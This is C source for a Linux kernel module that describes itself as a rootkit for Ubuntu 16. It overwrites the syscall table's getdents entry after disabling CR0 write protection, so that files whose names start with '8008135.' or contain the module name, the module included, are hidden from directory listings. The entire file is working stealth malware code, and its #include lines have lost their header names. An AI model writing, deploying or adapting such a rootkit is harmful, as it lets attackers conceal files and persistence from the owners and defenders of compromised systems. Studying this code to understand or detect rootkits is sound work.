#include #include #include #include #include #include #include "sysgen.h" #define GETDENTS_SYSCALL_NUM 78 #define WRITE_PROTECT_FLAG (1<<16) #define HIDE_PREFIX "8008135." #define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1) #define MODULE_NAME "8008135" #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) struct linux_dirent { unsigned long d_ino; unsigned long d_off; unsigned short d_reclen; // d_reclen is the way to tell the length of this entry char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. }; MODULE_AUTHOR("JKE"); MODULE_LICENSE("GPL v2"); MODULE_DESCRIPTION("RootKit for Ubuntu-16"); typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count); sys_getdents_t sys_getdents_orig = NULL; // our new getdents handler asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) { int boff; struct linux_dirent* ent; long ret = sys_getdents_orig(fd, dirent, count); char* dbuf; if (ret <= 0) { return ret; } dbuf = (char*)dirent; // go through the entries, looking for one that has our prefix for (boff = 0; boff < ret;) { ent = (struct linux_dirent*)(dbuf + boff); if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix || (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it // remove this entry by copying everything after it forward memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen)); // and adjust the length reported ret -= ent->d_reclen; } else { // on to the next entry boff += ent->d_reclen; } } return ret; } static int __init lkm_example_init(void) { printk(KERN_INFO "Hello, World!\n"); printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); // record the original getdents handler sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); // turn write protect off write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); // add our new handlers sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; // turn write protect back on write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "New syscall in place\n"); return 0; } static void __exit lkm_example_exit(void) { printk(KERN_INFO "Goodbye, World!\n"); // allow us to write to read onlu pages write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); // set getdents handler back sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; // turn write protect back on write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "Old syscall back\n"); } module_init(lkm_example_init); module_exit(lkm_example_exit);